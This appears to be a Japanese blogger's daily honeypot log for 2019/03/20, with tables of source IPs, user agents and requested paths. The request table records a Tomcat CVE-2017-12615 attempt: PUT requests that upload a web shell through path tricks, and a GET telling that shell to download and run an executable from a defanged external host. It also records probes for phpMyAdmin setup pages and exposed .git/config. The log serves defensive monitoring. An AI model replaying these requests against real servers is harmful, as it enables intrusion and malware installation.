ハニーポット(仮) 観測記録
2019/03/20分です。
アクセス数は少なかったですが
phpMyAdminに対するスキャンの他に
Apache Tomcatの脆弱性(CVE-2017-12615)を狙ったアクセスを確認しました。
PUTしてGETしているようです。
なお
w00tw00t.at.blackhats.romanian.anti-sec:)
はシグネチャ(署名)・名乗りを表しているようです。
総アクセス数:40 (前日比:-2065)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 111.115.76.15 | China |
| 2 | 117.3.69.247 | Vietnam |
| 1 | 124.120.121.87 | Thailand |
| 6 | 157.230.84.180 | United States |
| 3 | 198.167.223.52 | St Kitts and Nevis |
| 6 | 216.245.197.254 | United States |
| 3 | 222.85.133.206 | China |
| 2 | 49.49.242.211 | Thailand |
| 4 | 60.3.142.83 | China |
| 6 | 61.155.218.109 | China |
| 2 | 64.90.186.102 | United States |
| 3 | 93.174.93.114 | Netherlands |
| 1 | 94.23.193.110 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 263 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0) |
| 2 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 336 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 62 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
| 240 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
| 62 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 |
| 76 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid[.]hognoob[.]se/download.exe | HTTP/1.1 |
| 3 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /horde3/imp/test.php | HTTP/1.1 |
| 1 | GET | /horde/imp/test.php | HTTP/1.1 |
| 1 | GET | /imp/test.php | HTTP/1.1 |
| 6 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /phpinfo.php | HTTP/1.1 |
| 2 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /proxy.php | HTTP/1.1 |
| 2 | GET | /user/register/ | HTTP/1.1 |
| 2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 2 | HEAD | /robots.txt | HTTP/1.0 |
| 4 | HEAD | /robots.txt | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |
